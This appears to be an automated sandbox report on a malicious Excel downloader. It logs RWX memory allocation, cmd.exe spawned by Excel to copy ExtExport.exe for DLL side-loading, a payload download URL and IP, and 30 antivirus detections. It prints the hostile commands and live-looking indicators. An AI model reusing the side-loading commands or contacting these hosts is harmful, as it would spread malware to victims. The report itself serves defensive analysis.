document-37-1849.xls

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 16, 2021, 10:05 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1	0

Allocates read-write-execute memory (usually to unpack itself) (14 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dce1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75241000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbf1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbe1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dba1000 process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 16, 2021, 10:05 a.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06280000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 16, 2021, 10:05 a.m.	show_type: 0 filepath_r: cmd parameters: /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe filepath: cmd	1	1	0
ShellExecuteExW June 16, 2021, 10:05 a.m.	show_type: 0 filepath_r: C:\ycjqFXSM\kO2NIybn\pDImcT.exe parameters: C:\ycjqFXSM\kO2NIybn ALHJ zqtRI filepath: C:\ycjqFXSM\kO2NIybn\pDImcT.exe	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
cmdline	cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

excel.exe

martian_process

cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW June 16, 2021, 10:05 a.m.	url: https://austinheisey.com/xls/black/index/processingSetRequestDownloadPayloader/?servername=excel stack_pivoted: 0 filepath_r: C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll filepath: C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll		2148270085	0

One or more non-whitelisted processes were created (4 events)

parent_process	excel.exe				martian_process	"C:\ycjqFXSM\kO2NIybn\pDImcT.exe" C:\ycjqFXSM\kO2NIybn ALHJ zqtRI
parent_process	excel.exe				martian_process	"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process	excel.exe				martian_process	cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process	excel.exe				martian_process	C:\ycjqFXSM\kO2NIybn\pDImcT.exe C:\ycjqFXSM\kO2NIybn ALHJ zqtRI

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

51.195.123.188:443

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

DrWeb	X97M.DownLoader.666
ALYac	Trojan.Downloader.XLS.gen
Arcabit	Trojan.Generic.D234D754
Cyren	Trojan.TSOT-2
Symantec	W97M.Downloader
ESET-NOD32	a variant of VBA/TrojanDownloader.Agent.WFH
TrendMicro-HouseCall	TROJ_FRS.0NA103F221
Avast	Other:Malware-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKD.37017428
MicroWorld-eScan	Trojan.GenericKD.37017428
Ad-Aware	Trojan.GenericKD.37017428
Emsisoft	Trojan.GenericKD.37017428 (B)
Comodo	Malware@#rco8ck87qdse
TrendMicro	TROJ_FRS.0NA103F221
McAfee-GW-Edition	RDN/Encdoc
FireEye	Trojan.GenericKD.37017428
Ikarus	Trojan-Downloader.VBA.Agent
Avira	VBA/Dldr.Agent.ynuil
Gridinsoft	Trojan.U.Downloader.oa
Microsoft	TrojanDownloader:O97M/Encdoc.EPB!MTB
AegisLab	Trojan.MSOffice.Generic.4!c
ZoneAlarm	HEUR:Trojan.MSOffice.Generic
GData	Trojan.GenericKD.37017428
AhnLab-V3	Downloader/XLS.Generic
McAfee	RDN/Encdoc
MAX	malware (ai score=85)
Fortinet	MSExcel/EncBook.AO!tr
AVG	Other:Malware-gen [Trj]

The process excel.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe